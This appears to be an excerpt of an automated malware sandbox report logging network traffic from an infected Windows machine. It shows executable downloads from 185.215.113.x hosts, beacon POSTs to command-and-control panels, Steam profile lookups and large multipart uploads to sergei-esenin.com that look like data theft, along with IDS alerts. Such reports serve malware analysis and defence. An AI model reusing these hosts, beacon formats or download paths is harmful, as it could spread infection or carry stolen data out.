00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 18 Oct 2024 13:05:01 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 18 Oct 2024 12:50:16 GMTETag: "1cb800-624bfbeaba684"Accept-Ranges: bytesContent-Length: 1882112Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 50 6b 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 6b 00 00 04 00 00 6d 97 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 73 76 67 68 76 61 74 00 60 1a 00 00 e0 50 00 00 56 1a 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 63 69 72 75 75 69 77 00 10 00 00 00 40 6b 00 00 04 00 00 00 92 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 6b 00 00 22 00 00 00 96 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000349001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 35 30 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000350002&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAAAKJKJEBGHJKFHIDGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 34 33 42 33 45 37 35 41 39 43 32 35 34 35 34 36 36 32 37 36 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 2d 2d 0d 0a Data Ascii: ------BAAAAKJKJEBGHJKFHIDGContent-Disposition: form-data; name="hwid"AB43B3E75A9C2545466276------BAAAAKJKJEBGHJKFHIDGContent-Disposition: form-data; name="build"doma------BAAAAKJKJEBGHJKFHIDG--
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103If-Modified-Since: Fri, 18 Oct 2024 12:50:16 GMTIf-None-Match: "1cb800-624bfbeaba684"
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 35 31 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000351031&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 35 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000357001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.103If-Modified-Since: Fri, 18 Oct 2024 12:50:09 GMTIf-None-Match: "2d8200-624bfbe479d49"
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 36 31 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000361031&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDHJDHDAFHJJKJEHCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 34 33 42 33 45 37 35 41 39 43 32 35 34 35 34 36 36 32 37 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 2d 2d 0d 0a Data Ascii: ------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="hwid"AB43B3E75A9C2545466276------AKEGDHJDHDAFHJJKJEHCContent-Disposition: form-data; name="build"doma------AKEGDHJDHDAFHJJKJEHC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 34 30 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000401001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIDBKFCAAEBFIDHDBAEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 34 33 42 33 45 37 35 41 39 43 32 35 34 35 34 36 36 32 37 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 44 42 4b 46 43 41 41 45 42 46 49 44 48 44 42 41 45 2d 2d 0d 0a Data Ascii: ------FHIDBKFCAAEBFIDHDBAEContent-Disposition: form-data; name="hwid"AB43B3E75A9C2545466276------FHIDBKFCAAEBFIDHDBAEContent-Disposition: form-data; name="build"doma------FHIDBKFCAAEBFIDHDBAE--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDHDAECBGCAKEBAEBAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 34 33 42 33 45 37 35 41 39 43 32 35 34 35 34 36 36 32 37 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 48 44 41 45 43 42 47 43 41 4b 45 42 41 45 42 41 2d 2d 0d 0a Data Ascii: ------GHJDHDAECBGCAKEBAEBAContent-Disposition: form-data; name="hwid"AB43B3E75A9C2545466276------GHJDHDAECBGCAKEBAEBAContent-Disposition: form-data; name="build"doma------GHJDHDAECBGCAKEBAEBA--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIIJJJDGCBAAKFIIECGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 34 33 42 33 45 37 35 41 39 43 32 35 34 35 34 36 36 32 37 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 2d 2d 0d 0a Data Ascii: ------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="hwid"AB43B3E75A9C2545466276------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="build"doma------KFIIJJJDGCBAAKFIIECG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 42 37 34 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12B74B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 104.21.53.8 104.21.53.8
Source: Joe Sandbox View IP Address: 185.215.113.37 185.215.113.37
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: AKAMAI-ASUS AKAMAI-ASUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49799 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49830 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49884 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49956 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49956 -> 185.215.113.16:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=LAlU2jiP0ih1GCQ2tR8pCO9umtnkgr__mMhgdSGI1E8-1729256669-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=LAlU2jiP0ih1GCQ2tR8pCO9umtnkgr__mMhgdSGI1E8-1729256669-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18168Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=LAlU2jiP0ih1GCQ2tR8pCO9umtnkgr__mMhgdSGI1E8-1729256669-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8789Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=LAlU2jiP0ih1GCQ2tR8pCO9umtnkgr__mMhgdSGI1E8-1729256669-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20442Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=LAlU2jiP0ih1GCQ2tR8pCO9umtnkgr__mMhgdSGI1E8-1729256669-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1290Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=LAlU2jiP0ih1GCQ2tR8pCO9umtnkgr__mMhgdSGI1E8-1729256669-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 567125Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=oVu0E9qEE3l6igEmGLJahzIyOc76s9q8jI5.nj__y8Q-1729256686-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=oVu0E9qEE3l6igEmGLJahzIyOc76s9q8jI5.nj__y8Q-1729256686-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18168Host: sergei-esenin.com
